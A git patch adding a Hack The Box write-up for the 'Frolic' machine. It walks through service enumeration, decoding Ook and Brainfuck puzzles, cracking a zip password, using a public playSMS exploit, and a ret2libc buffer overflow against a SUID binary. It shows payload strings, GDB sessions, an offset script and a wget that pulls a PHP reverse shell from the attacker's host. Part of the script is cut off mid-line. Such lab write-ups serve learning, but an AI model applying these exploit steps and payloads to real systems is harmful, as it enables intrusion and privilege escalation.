From 6e4456f8e3162e3b9de9903777684c8a03792e56 Mon Sep 17 00:00:00 2001 From: Dan Goldsmith Date: Thu, 10 Oct 2019 14:45:25 +0100 Subject: [PATCH] Frolic HTB Writup added --- HTB_Writups/Frolic.md | 731 ++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 731 insertions(+) create mode 100644 HTB_Writups/Frolic.md diff --git a/HTB_Writups/Frolic.md b/HTB_Writups/Frolic.md new file mode 100644 index 0000000..fab4e01 --- /dev/null +++ b/HTB_Writups/Frolic.md @@ -0,0 +1,731 @@ +--- +title: Frolic +tags: Linux, Encoding +--- + +# Recon + +Getting a bit more wise to how this works, so simulatinously visit the +web while I start the basic Nmap scanning. However, Interesting, doesnt have a +HTTP interface, so I have to hang about waiting on the scan. + +## NMAP + +~~~ term +dang@dang-laptop ~/Documents/HTB$ nmap -sV 10.10.10.111 +Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-28 22:30 GMT +Nmap scan report for 10.10.10.111 +Host is up (0.17s latency). +Not shown: 996 closed ports +PORT STATE SERVICE VERSION +22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) +139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) +445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) +9999/tcp open http nginx 1.10.3 (Ubuntu) +Service Info: Host: FROLIC; OS: Linux; CPE: cpe:/o:linux:linux_kernel + +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +Nmap done: 1 IP address (1 host up) scanned in 26.96 seconds +~~~ + +We can visit port 9999 and discuver wha we have an nginx server so it does after all. + +~~~ term +dang@dang-laptop ~$ nmap -A 10.10.10.111 Starting Nmap 7.70 ( https://nmap.org ) at 2019-03-04 21:01 GMT +Nmap scan report for 10.10.10.111 +Host is up (0.051s latency). +Not shown: 996 closed ports +PORT STATE SERVICE VERSION +22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0) +| ssh-hostkey: +| 2048 87:7b:91:2a:0f:11:b6:57:1e:cb:9f:77:cf:35:e2:21 (RSA) +| 256 b7:9b:06:dd:c2:5e:28:44:78:41:1e:67:7d:1e:b7:62 (ECDSA) +|_ 256 21:cf:16:6d:82:a4:30:c3:c6:9c:d7:38:ba:b5:02:b0 (ED25519) +139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) +445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) +9999/tcp open http nginx 1.10.3 (Ubuntu) +|_http-server-header: nginx/1.10.3 (Ubuntu) +|_http-title: Welcome to nginx! +Service Info: Host: FROLIC; OS: Linux; CPE: cpe:/o:linux:linux_kernel + +Host script results: +|_clock-skew: mean: -1h48m40s, deviation: 3h10m30s, median: 1m18s +|_nbstat: NetBIOS name: FROLIC, NetBIOS user: , NetBIOS MAC: (unknown) +| smb-os-discovery: +| OS: Windows 6.1 (Samba 4.3.11-Ubuntu) +| Computer name: frolic +| NetBIOS computer name: FROLIC\x00 +| Domain name: \x00 +| FQDN: frolic +|_ System time: 2019-03-05T02:32:43+05:30 +| smb-security-mode: +| account_used: guest +| authentication_level: user +| challenge_response: supported +|_ message_signing: disabled (dangerous, but default) +| smb2-security-mode: +| 2.02: +|_ Message signing enabled but not required +| smb2-time: +| date: 2019-03-04 21:02:42 +|_ start_date: N/A + +Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . +Nmap done: 1 IP address (1 host up) scanned in 16.81 seconds +dang@dang-laptop ~$ +~~~ + +## HTTP Enumeration + +Port 9999 is standard page. + +### Nikto + +~~~ +root@kali:~# nikto -host 10.10.10.111 -port 9999 +- Nikto v2.1.6 +--------------------------------------------------------------------------- ++ Target IP: 10.10.10.111 ++ Target Hostname: 10.10.10.111 ++ Target Port: 9999 ++ Start Time: 2019-03-05 15:24:48 (GMT0) +--------------------------------------------------------------------------- ++ Server: nginx/1.10.3 (Ubuntu) ++ Server leaks inodes via ETags, header found with file /, fields: 0x5ba78110 0x27d ++ The anti-clickjacking X-Frame-Options header is not present. ++ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS ++ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type ++ No CGI Directories found (use '-C all' to force check all possible dirs) ++ OSVDB-3092: /admin/: This might be interesting... ++ OSVDB-3092: /backup/: This might be interesting... ++ /test/: Output from the phpinfo() function was found. ++ OSVDB-3092: /test/: This might be interesting... ++ /test/index.php: Output from the phpinfo() function was found. ++ OSVDB-3233: /test/index.php: PHP is installed, and a test script which runs phpinfo() was found. This gives a lot of system information. ++ /admin/index.html: Admin login page/section found. ++ 7501 requests: 0 error(s) and 11 item(s) reported on remote host ++ End Time: 2019-03-05 15:28:50 (GMT0) (242 seconds) +--------------------------------------------------------------------- +~~~ + +### Dirbuster + +Dirbuster found + - test/ + - backup/ + +~~~ +Dir found: /test/ - 200 +File found: /test/index.php - 200 +Dir found: /admin/css/ - 403 +Dir found: /dev/ - 403 +Dir found: /admin/js/ - 403 +Dir found: /backup/ - 200 +File found: /backup/index.php - 200 +Dir found: /dev/backup/ - 200 +File found: /dev/backup/index.php - 200 + + - Dir found: /loop/ - 403 +Dir found: /backup/loop/ - 403 +Dir found: /loop/loop/ - 403 +Dir found: /backup/loop/loop/ - 403 +Dir found: /loop/loop/loop/ - 403 +Dir found: /backup/loop/loop/loop/ - 403 +Dir found: /loop/loop/loop/loop/ - 403 +Dir found: /backup/loop/loop/loop/loop/ - 403 +~~~ + + +Inside dev/backup we find /playsms +Inside backup we get a username and password + + - admin:imnothuman + +WHICH TURN OUT TO BE SMB CREDS!! However, that lead me a "merry chase" +down the SMB, rabithole. + +### Coninuing the HTTP Enum + +Admin directory lives us a login page. + - Source shows admin and superduperlooperpassword_lol + +Presents http://10.10.10.111:9999/admin/success.html + +Which is + +~~~ term +..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... ..... ..... ..... ..... ..!.? ..... ..... .!?!! .?... ..... ..?.? !.?.. ..... ..... ....! ..... ..... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !...! ..... ..... .!.!! !!!!! !!!!! !!!.? ..... ..... ..... ..!?! !.?!! !!!!! !!!!! !!!!? .?!.? !!!!! !!!!! !!!!! .?... ..... ..... ....! ?!!.? ..... ..... ..... .?.?! .?... ..... ..... ...!. !!!!! !!.?. ..... .!?!! .?... ...?. ?!.?. ..... ..!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!!!. ?.... ..... ..... ...!? !!.?! !!!!! !!!!! !!!!! ?.?!. ?!!!! !!!!! !!.?. ..... ..... ..... .!?!! .?... ..... ..... ...?. ?!.?. ..... !.... ..... ..!.! !!!!! !.!!! !!... ..... ..... ....! .?... ..... ..... ....! ?!!.? !!!!! !!!!! !!!!! !?.?! .?!!! !!!!! !!!!! !!!!! !!!!! .?... ....! ?!!.? ..... .?.?! .?... ..... ....! .?... ..... ..... ..!?! !.?.. ..... ..... ..?.? !.?.. !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... .!?!! .?!!! !!!?. ?!.?! !!!!! !!!!! !!... ..... ...!. ?.... ..... !?!!. ?!!!! !!!!? .?!.? !!!!! !!!!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!.! !!!!! !!!!! !!!!! !.... ..... ..... ..... !.!.? ..... ..... .!?!! .?!!! !!!!! !!?.? !.?!! !.?.. ..... ....! ?!!.? ..... ..... ?.?!. ?.... ..... ..... ..!.. ..... ..... .!.?. ..... ...!? !!.?! !!!!! !!?.? !.?!! !!!.? ..... ..!?! !.?!! !!!!? .?!.? !!!!! !!.?. ..... ...!? !!.?. ..... ..?.? !.?.. !.!!! !!!!! !!!!! !!!!! !.?.. ..... ..!?! !.?.. ..... .?.?! .?... .!.?. ..... ..... ..... .!?!! .?!!! !!!!! !!!!! !!!?. ?!.?! !!!!! !!!!! !!.!! !!!!! ..... ..!.! !!!!! !.?. +~~~ + + +> NOTE: Got a bit stuck here, Looking on the Froums, this looks like +> it could be BLurb or Ook (Is a Brainfuck Derivitive, and there is a +> clue about fish) + +Converting the code (small python script perpend Ook to each argument, +then run through a onine Ook parser we end up with.. + +~~~ +Nothing here check /asdiSIAJJ0QWE9JAS +~~~ + + +> NOTE: This is where I discovered Cyberchef. Bloody godsend given +> that next bit is all about decoding a silly number of times. + +Navigating there gives us a second message. + +~~~ +UEsDBBQACQAIAMOJN00j/lsUsAAAAGkCAAAJABwAaW5kZXgucGhwVVQJAAOFfKdbhXynW3V4CwAB BAAAAAAEAAAAAF5E5hBKn3OyaIopmhuVUPBuC6m/U3PkAkp3GhHcjuWgNOL22Y9r7nrQEopVyJbs K1i6f+BQyOES4baHpOrQu+J4XxPATolb/Y2EU6rqOPKD8uIPkUoyU8cqgwNE0I19kzhkVA5RAmve EMrX4+T7al+fi/kY6ZTAJ3h/Y5DCFt2PdL6yNzVRrAuaigMOlRBrAyw0tdliKb40RrXpBgn/uoTj lurp78cmcTJviFfUnOM5UEsHCCP+WxSwAAAAaQIAAFBLAQIeAxQACQAIAMOJN00j/lsUsAAAAGkC AAAJABgAAAAAAAEAAACkgQAAAABpbmRleC5waHBVVAUAA4V8p1t1eAsAAQQAAAAABAAAAABQSwUG AAAAAAEAAQBPAAAAAwEAAAAA +~~~ + +Which with a bit of Faffing, turns out to be a zip file encoded with base 64. +- Which is password encoded. + +WE make use of fcrackzip + +~~~ +user@kali:~$ fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt data.zip + +PASSWORD FOUND!!!!: pw == password +user@kali:~$ +~~~ + +Now we get an index.php file + +~~~ +4b7973724b7973674b7973724b7973675779302b4b7973674b7973724b7973674b79737250463067506973724b7973674b7934744c5330674c5330754b7973674b7973724b7973674c6a77720d0a4b7973675779302b4b7973674b7a78645069734b4b797375504373674b7974624c5434674c53307450463067506930744c5330674c5330754c5330674c5330744c5330674c6a77724b7973670d0a4b317374506973674b79737250463067506973724b793467504373724b3173674c5434744c53304b5046302b4c5330674c6a77724b7973675779302b4b7973674b7a7864506973674c6930740d0a4c533467504373724b3173674c5434744c5330675046302b4c5330674c5330744c533467504373724b7973675779302b4b7973674b7973385854344b4b7973754c6a776743673d3d0d0a +~~~ + +Which if we convert to ASCII -> Then Base64 we end up with Brainfuck + +Which then translates to + +~~~ +idkwhatispass +~~~ + +This works as creds (with admin) on +http://10.10.10.111:9999/playsms/index.php?app=main&inc=core_welcome + +# Play SMS Exploit + +https://amonsec.net/ctf/dina-ctf-walkthrough +https://www.exploit-db.com/exploits/42003/ + + +## Getting User + +Grab a script from https://github.com/jasperla/CVE-2017-9101 +$ python playsms.py --url http://10.10.10.111:9999/playsms -i + +And I gets user +~~~ term +> cat /home/ayush/user.txt + +2ab95909cf509f85a6f476b59a0c2fe0 +~~~ + + +# Getting Root. + +Standard Enumeration, Look for suid files. This time we find + +~~~ term +-rwsr-xr-x 1 root root 7480 Sep 25 00:59 /home/ayush/.binary/rop +~~~ + +ROP, sounds like a clue. + +## Trying the exploit on my machine +We can copy that acoss by copying to the www directoy, then download. + +Seems like we have an overflow with some ROP based programming, so I can follow along with this + +https://resources.infosecinstitute.com/hack-the-box-htb-machines-walkthrough-series-october/ + + +First Step, determine the buffer overflow + +~~~ term +(env) dang@dang-laptop ~/Documents/HTB/Frolic$ ./rop `python2 -c "print 'A' * 1000"` +~~~ + +Or in GDB + +~~~ term +Starting program: /home/dang/Documents/HTB/Frolic/rop `python2 -c "print 'A' * 56"` + +Program received signal SIGSEGV, Segmentation fault. +0x41414141 in ?? () +(gdb) +~~~ + +Looks like Grap EIP at 52 Bytes + +~~~ term +Starting program: /home/dang/Documents/HTB/Frolic/rop `python2 -c "print 'A' * 52 + 'BBBB'"` + +Program received signal SIGSEGV, Segmentation fault. +0x42424242 in ?? () +(gdb) +~~~ + +We want to follow the basic ROP techingqye of `````` +These will live in libc so we need to find them + +We also know tat they are offset from libc... + +~~~ term +(env) dang@dang-laptop ~/Documents/HTB/Frolic$ ldd ./rop | grep libc + libc.so.6 => /usr/lib32/libc.so.6 (0xf7dad000) +(env) dang@dang-laptop ~/Documents/HTB/Frolic$ ldd ./rop | grep libc + libc.so.6 => /usr/lib32/libc.so.6 (0xf7d15000) +(env) dang@dang-laptop ~/Documents/HTB/Frolic$ ldd ./rop | grep libc + libc.so.6 => /usr/lib32/libc.so.6 (0xf7d14000) +(env) dang@dang-laptop ~/Docume +~~~ + +This is moving around so lets +(Note: To start off with I want to make my life easy, so lets diable ALSR) + +~~~ term +(env) dang@dang-laptop ~/Documents/HTB/Frolic$ cat /proc/sys/kernel/randomize_va_space +2 +(env) dang@dang-laptop ~/Documents/HTB/Frolic$ sudo sysctl kernel.randomize_va_space=0 +~~~ + +Which means Libc is now at 0x7fdc4000 + +~~~ term +(env) dang@dang-laptop ~/Documents/HTB/Frolic$ ldd ./rop | grep libc 1 ↵ + libc.so.6 => /usr/lib32/libc.so.6 (0xf7dc4000) +~~~ + +Lets grab System from libc (NOTE: Dont be a Dick, check the address of Libc) + +~~~ term +(env) dang@dang-laptop ~/Documents/HTB/Frolic$ readelf -s /usr/lib32/libc.so.6| grep system + 257: 0012adb0 102 FUNC GLOBAL DEFAULT 13 svcerr_systemerr@GLIBC_2.0 + 657: 0003e8f0 55 FUNC GLOBAL DEFAULT 13 __libc_system@@GLIBC_PRIVATE + 1524: 0003e8f0 55 FUNC WEAK DEFAULT 13 system@@GLIBC_2.0 + 569: 00000000 0 FILE LOCAL DEFAULT ABS system.c + 570: 0003e3f0 1071 FUNC LOCAL DEFAULT 13 do_system + 5335: 0012adb0 102 FUNC LOCAL DEFAULT 13 __GI_svcerr_systemerr + 6792: 0012adb0 102 FUNC LOCAL DEFAULT 13 __EI_svcerr_systemerr + 7434: 0003e8f0 55 FUNC WEAK DEFAULT 13 system + 7486: 0012adb0 102 FUNC GLOBAL DEFAULT 13 svcerr_systemerr@GLIBC_2. + 8144: 0003e8f0 55 FUNC GLOBAL DEFAULT 13 __libc_system +(env) dang@dang-laptop ~/Documents/HTB/Frolic$ +~~~ + +== ``` 1524: 0003e8f0 55 FUNC WEAK DEFAULT 13 system@@GLIBC_2.0``` + + +Exit + +~~~ term +(env) dang@dang-laptop ~/Documents/HTB/Frolic$ readelf -s /usr/lib32/libc.so.6| grep exit + 121: 00031db0 39 FUNC GLOBAL DEFAULT 13 __cxa_at_quick_exit@@GLIBC_2.10 + 150: 000318e0 33 FUNC GLOBAL DEFAULT 13 exit@@GLIBC_2.0 +~~~ + +And find a call to /bin/sh + +~~~ term +dang@dang-laptop ~/Documents/HTB/Frolic$ strings -a -t x /usr/lib32/libc.so.6 | grep /bin/sh + 17faaa /bin/sh +~~~ + +As these are offset we need to calculate with regard to Libc Address + + - Libc 0xf7dc4000 + + - System 0x45380 + - Exit 0x3a570 + - /bin/sh 0x17faaa + +|------|------------|-------------| +| Sys | 0xf7e028f0 | f7 e0 28 f0 | +| Exit | 0xf7df58e0 | f7 df 58 e0 | +| Sh | 0xf7f43aaa | f7 f4 3a aa | + + + Therefore our overflow becomes + ```<52>``` + + or (Rember Endianness) + + ```python2 -c "print 'A'*52+'\xf0\x28\xe0\xf7\xe0\x58\xdf\xf7\xaa\xba\xfb\xf7'"`` + + Which gives me an error of nsorted not found... + + ~~~term + (env) dang@dang-laptop ~/Documents/HTB/Frolic$ ./rop `python2 -c "print 'A'*52 + '\xf0\x28\xe0\xf7\xe0\x58\xdf\xf7\x19\x85\xf4\xf7' + 'C'*50"` +sh: nsorted: command not found +[+] Message sent: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�(��X���CCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCCC% +~~~ + +> NOTE: Ended up doing this again in GDB. Turns out I was calling out +> to the wrong version of glibc. Live and Learn :( + +## Thying the ROP chain in GDB + +So I can work out what is happeing.. + +Confirm that we control EIP +~~~ term +(gdb) run `python2 -c "print 'A'*52 + 'BBBB'" +~~~ + +Find the call to system and Exit (Which match our other ones) + +~~~ term +Breakpoint 1 at 0x80484aa +(gdb) run +The program being debugged has been started already. +Start it from the beginning? (y or n) y +Starting program: /home/dang/Documents/HTB/Frolic/rop `python2 -c "print 'A'*52 + 'BBBB'"` + +Breakpoint 1, 0x080484aa in main () +(gdb) p system +$1 = {} 0xf7e028f0 +(gdb) + +(gdb) p exit +$2 = {} 0xf7df58e0 +(gdb) +~~~ + +We could then confirm we hit system (at least) + +~~~ term +(gdb) break system +Breakpoint 2 at 0xf7e028f0 +~~~ + + +Without the Mangled Address + +~~~ term +(gdb) run `python2 -c "print 'A'*52 + 'BBBB'"` +Starting program: /home/dang/Documents/HTB/Frolic/rop `python2 -c "print 'A'*52 + 'BBBB'"` + +Breakpoint 1, 0x080484aa in main () +(gdb) continue +Continuing. + +Program received signal SIGSEGV, Segmentation fault. +0x42424242 in ?? () +(gdb) continue +Continuing. + +Program terminated with signal SIGSEGV, Segmentation fault. +The program no longer exists. +(gdb) +~~~ + +And With It + +~~~ term +(gdb) run `python2 -c "print 'A'*52 + '\xf0\x28\xe0\xf7'"` +Starting program: /home/dang/Documents/HTB/Frolic/rop `python2 -c "print 'A'*52 + '\xf0\x28\xe0\xf7'"` + +Breakpoint 1, 0x080484aa in main () +(gdb) continue +Continuing. + +Breakpoint 2, 0xf7e028f0 in system () from /usr/lib32/libc.so.6 +(gdb) continue +Continuing. +[Detaching after fork from child process 30400] +sh: $'4\325\377\377X\325\377\377': command not found + +Program received signal SIGSEGV, Segmentation fault. +0xffffd500 in ?? () +(gdb) +~~~ + +Adding Exit + +~~~ term +Starting program: /home/dang/Documents/HTB/Frolic/rop `python2 -c "print 'A'*52 + '\xf0\x28\xe0\xf7\xe0\x58\xdf\xf7'"` + +Breakpoint 1, 0x080484aa in main () +(gdb) continue +Continuing. + +Breakpoint 2, 0xf7e028f0 in system () from /usr/lib32/libc.so.6 +(gdb) continue +Continuing. +[Detaching after fork from child process 30405] +sh: $'\323\377\377': command not found +[+] Message sent: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA�(��X�[Inferior 1 (process 30403) exited with code 0300] +(gdb) +~~~ + +And grabbing SH from where we guessed it would be. + +f7 f4 3a aa + +~~~ term +(gdb) run `python2 -c "print 'A'*52 + '\xf0\x28\xe0\xf7\xe0\x58\xdf\xf7\xaa\x3a\xf4\xf7'"` +The program being debugged has been started already. +Start it from the beginning? (y or n) y +Starting program: /home/dang/Documents/HTB/Frolic/rop `python2 -c "print 'A'*52 + '\xf0\x28\xe0\xf7\xe0\x58\xdf\xf7\xaa\x3a\xf4\xf7'"` + +Breakpoint 1, 0x080484aa in main () +(gdb) continue +Continuing. + +Breakpoint 2, 0xf7e028f0 in system () from /usr/lib32/libc.so.6 +(gdb) continue +Continuing. +[Detaching after fork from child process 30938] +sh-5.0$ +~~~ +WOOT!!! + + +## Rooting the Box + + +Firstly the Shell I have been using is a bit fraught, Replace it the +the PHP reverse shell to see if that behaves better. + +Pentest Monkey php reverse shell, Fire up a python webserver and + +~~~ term +> wget 10.10.14.251:8000/dangPayload.php -O plugin/dangPayload.php + +~~~ + +Things behave a bit better. + +Nice that ALSR is turned off + +~~~ term +$ cat /proc/sys/kernel/randomize_va_space +0 +~~~ + +Lets also copy a local version across so I can play without screwing +up the main binary. + +~~~ term +cp /home/ayush/.binary/rop rop +~~~ + +Confirm offset of libc + +~~~ term +$ ldd rop | grep libc + libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e19000) +$ ldd rop | grep libc + libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e19000) +$ +$ ldd /home/ayush/.binary/rop | grep libc + libc.so.6 => /lib/i386-linux-gnu/libc.so.6 (0xb7e19000) +$ +~~~ + +System + +~~~ term +$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep system + 245: 00112f20 68 FUNC GLOBAL DEFAULT 13 svcerr_systemerr@@GLIBC_2.0 + 627: 0003ada0 55 FUNC GLOBAL DEFAULT 13 __libc_system@@GLIBC_PRIVATE + 1457: 0003ada0 55 FUNC WEAK DEFAULT 13 system@@GLIBC_2.0 +$ +~~~ + +Exit + +~~~ term +$ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep exit + 112: 0002edc0 39 FUNC GLOBAL DEFAULT 13 __cxa_at_quick_exit@@GLIBC_2.10 + 141: 0002e9d0 31 FUNC GLOBAL DEFAULT 13 exit@@GLIBC_2.0 +~~~ + +And SH + +~~~ term +$ strings -a -t x /lib/i386-linux-gnu/libc.so.6 | grep /bin/sh + 15ba0b /bin/sh +$ +~~~ + +## Offset Notes + +- Libc /lib/i386-linux-gnu/libc.so.6 0xb7e19000 +- System: 0x0003ada0 +- Exit: 0x0002e9d0 +- Bin Sh: 0x15ba0b + +From the Offset Calc Script + +|------------|------|----------| +| 0xb7e53da0 | 0xb7 | e5 3d a0 | +| 0xb7e479d0 | 0xb7 | e4 79 d0 | +| 0xb7f74a0b | 0xb7 | f7 4a 0b | + + +So Payload is + +```python2 -c "print 'A'*52+'\x0a\x3d\xe5\xb7'+'\xd0\x79\xe4\xb7'+'\x0b\x4a\xf7\xb7'"``` + +We can try this though it doesnt help + +~~~ term +$ ltrace ./dangrop `python2 -c "print 'A'*52+'\x0a\x3d\xe5\xb7\xd0\x79\xe4\xb7\x0b\x4a\xf7\xb7'"` +Segmentation fault (core dumped) +$ +~~~ + +strace ./dangrop `python2 -c "print 'A'*52+'B'"` + +Which I think Gives me what I need as I can confirm EIP. + +~~~ term +--- SIGSEGV {si_signo=SIGSEGV, si_code=SEGV_MAPERR, si_addr=0x42424242} --- ++++ killed by SIGSEGV (core dumped) +++ +Segmentation fault (core dumped) +www-data@frolic:/tmp/dg$ +~~~ + + +## Yet more Faffing for Root!!! + +Had to write a script to do the calcs as I was evidently screting something up + +~~~ python +#Set of Libary +""" +- System: 0x0003ada0 +- Exit: 0x0002e9d0 +- Bin Sh: 0x15ba0b +""" + +LIBC = 0xb7e19000 + +SYSTEM = 0x3ada0 +EXIT = 0x2e9d0 +SH = 0x15ba0b + +sysoffset = LIBC + SYSTEM +exitoffset = LIBC + EXIT +shoffset = LIBC + SH + +#print (hex(sysoffset)) +#print (hex(exitoffset)) +#print (hex(shoffset)) + +import struct + +out = "A"*52 +out += struct.pack(" +| Path: C:\tmp +| Anonymous access: READ/WRITE +| Current user access: READ/WRITE +| \\10.10.10.111\print$: +| Type: STYPE_DISKTREE +| Comment: Printer Drivers +| Users: 0 +| Max Users: +| Path: C:\var\lib\samba\printers +| Anonymous access: +|_ Current user access: + +Nmap done: 1 IP address (1 host up) scanned in 3.41 seconds +user@MarbleArch ~ % +~~~ + + +### Manually checking + +First lets enumerate the shares... + +~~~ +user@kali:~$ smbclient -L 10.10.10.111 -n +WARNING: The "syslog" option is deprecated +Enter WORKGROUP\user's password: +OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu] + + Sharename Type Comment + --------- ---- ------- + print$ Disk Printer Drivers + IPC$ IPC IPC Service (frolic server (Samba, Ubuntu)) +OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu] + + Server Comment + --------- ------- + + Workgroup Master + --------- ------- + WORKGROUP +user@kali:~$ +~~~ + + +So the shares with need permissions + +WE can check with (Print is locked down) + +~~~ +user@kali:~$ smbclient //10.10.10.111/IPC$ -N +WARNING: The "syslog" option is deprecated +OS=[Windows 6.1] Server=[Samba 4.3.11-Ubuntu] +smb: \> +~~~